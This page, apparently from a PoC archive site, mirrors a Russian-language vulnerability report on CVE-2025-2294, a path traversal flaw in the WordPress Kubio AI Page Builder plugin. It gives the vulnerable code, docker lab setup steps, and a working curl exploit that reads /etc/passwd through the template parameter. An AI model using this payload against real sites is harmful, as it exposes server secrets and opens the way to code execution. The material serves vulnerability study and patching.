POC详情: 535d2182d4cb80d3b4cb7e7ce108c918163a030a

来源
关联漏洞
标题: WordPress plugin Kubio AI Page Builder 路径遍历漏洞 (CVE-2025-2294)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Kubio AI Page Builder 2.5.1及之前版本存在路径遍历漏洞,该漏洞源于kubio_hybrid_theme_load_template函数存在本地文件包含,可能导致未认证攻击者包含和执行任意文件。
介绍
# CVE-2025-2294

## Введение
**CVE-2025-2294** — критическая уязвимость типа **Local File Inclusion (LFI)** в плагине **Kubio AI Page Builder** для WordPress. Уязвимость позволяет **неаутентифицированному** удалённому злоумышленнику передать специально сформированный параметр, из-за чего плагин может включить произвольный файл на сервере; при наличии включаемого PHP-файла это может привести к удалённому выполнению кода (RCE).

- **Поражаемые версии:** все версии плагина **≤ 2.5.1**.  
- **CVSS v3.1:** **9.8 (Critical)**.

---

## Цель отчёта
1. Систематизировать доступные материалы и объяснить суть уязвимости.  
2. Рассмотреть условия и конфигурации, при которых уязвимость актуальна.  
3. Показать способы обнаружения и рекомендации по защите (без пошаговых PoC).  
4. Дать рекомендации по устранению и смягчению последствий.

---

## CPE / идентификация
- **Plugin slug:** `kubio`  
- **Путь:** `/wp-content/plugins/kubio/`  
- **Vendor:** ExtendThemes / Kubio  
- **CPE (пример):** `cpe:2.3:a:extendthemes:kubio_ai_page_builder::::::wordpress::*`

**CWE:** CWE-22 — *Improper Limitation of a Pathname to a Restricted Directory (Path Traversal)*.

---

## Условия эксплуатации
- Плагин Kubio установлен и активирован на сайте.  
- Версия **≤ 2.5.1** (непатченная).  
- Доступен публичный HTTP(S) endpoint, принимающий параметр `__kubio-site-edit-iframe-classic-template`.  
- (Для получения RCE) В системе должен существовать включаемый PHP-файл или иной путь к исполняемому коду (например, через уязвимости в других компонентах или неправильные права).

---

## Импакт
- Чтение файлов с секретами (например, `wp-config.php`, приватные ключи, логи).  
- Возможна загрузка/выполнение произвольного кода, изменение контента или внедрение бекдоров.  
- Компромисс сервера, возможные нарушения работы сайта, удаление/шифрование данных.  
- Масштаб риска увеличивается из-за широкого распространения плагина и появления публичных PoC/сканеров.

---

## Технические детали
Уязвимый код связан с функцией `kubio_hybrid_theme_load_template()`, которая обращается к глобальному массиву `$_REQUEST`:

```php
$template_id = Arr::get($_REQUEST, '__kubio-site-edit-iframe-classic-template', false);
if ($template_id) {
    $new_template = locate_template([$template_id]);
    if ($new_template !== '') {
        return $new_template;
    }
}
```

- **Что делает код:**
1. `Arr::get($_REQUEST, '__kubio-site-edit-iframe-classic-template', false)` — берёт значение прямо из глобального набора входных данных ($_REQUEST объединяет $_GET, $_POST, $_COOKIE). `Это означает, что параметр управляем удалённо.

2. Если параметр присутствует (`$template_id` истинно), код вызывает `locate_template([$template_id])`.

3. `locate_template()` — WordPress-утилита (или аналог в плагине) для поиска шаблонов по переданному относительному пути/имени. В нормальном сценарии ожидалось, что туда будут передаваться имена файлов внутри безопасного каталога шаблонов, например `header.php` или `template-parts/content.php`.

4. Возвращаемое значение ($new_template) затем используется — в исходной реализации это может привести к include/require найденного пути, либо к передаче этого пути дальше для вывода.Это создаёт возможность LFI: злоумышленник может указать путь к произвольному файлу.


## Локальный запуск

```bash
git clone https://github.com/iteride/CVE-2025-2294.git && cd CVE-2025-2294/ && docker-compose up -d
```
- Заходим в докер:

```bash
docker exec -it <WORDPRESS_DOCKER_ID> bash
```

- Скачиваем и запускаем kubio

> *Для запуска после распаковки перейдите в http://localhost:8080/wp-admin/plugins.php и активируйте плагин*

```bash
cd /var/www/html/wp-content/plugins
curl -L -o kubio-2.5.1.zip "https://downloads.wordpress.org/plugin/kubio.2.5.1.zip"
unzip kubio-2.5.1.zip
rm kubio-2.5.1.zip
chown -R www-data:www-data kubio
```

## POC/Exploit

```bash
curl 'http://localhost:8080/?__kubio-site-edit-iframe-preview=1&__kubio-site-edit-iframe-classic-template=../../../../../../../../../etc/passwd'
```


![lfi](/img/lfi.png)


**`__kubio-site-edit-iframe-classic-template=<path>`**

Этот параметр передаёт строку, которую плагин использует как идентификатор/путь шаблона.

В уязвимом фрагменте кода значение берётся из `$_REQUEST` и передаётся в `locate_template()` без предварительной нормализации или ограничения. В результате возможен **path traversal**: если в значение вставить последовательности `../`, итоговый путь может выйти за пределы ожидаемой директории шаблонов и указывать на любой файл на файловой системе (в том числе `/etc/passwd`).

Именно этот параметр несёт полезную нагрузку атаки — с его помощью атакующий указывает целевой файл.


**`__kubio-site-edit-iframe-preview=1`**

Это служебный флаг (режим предпросмотра / iframe-edit mode). Он переключает обработку запроса в кодовую ветку, где считывается и используется шаблон, заданный в `__kubio-site-edit-iframe-classic-template`.

Без `preview=1` плагин мог бы не обрабатывать параметр `classic-template` или использовать другую логику; с `preview=1` включается логика, которая допускает чтение и возвращение шаблона, что делает возможным эксплуатацию.

文件快照

[4.0K] /data/pocs/535d2182d4cb80d3b4cb7e7ce108c918163a030a ├── [ 833] docker-compose.yml ├── [4.0K] img │   └── [ 92K] lfi.png └── [7.5K] README.md 1 directory, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。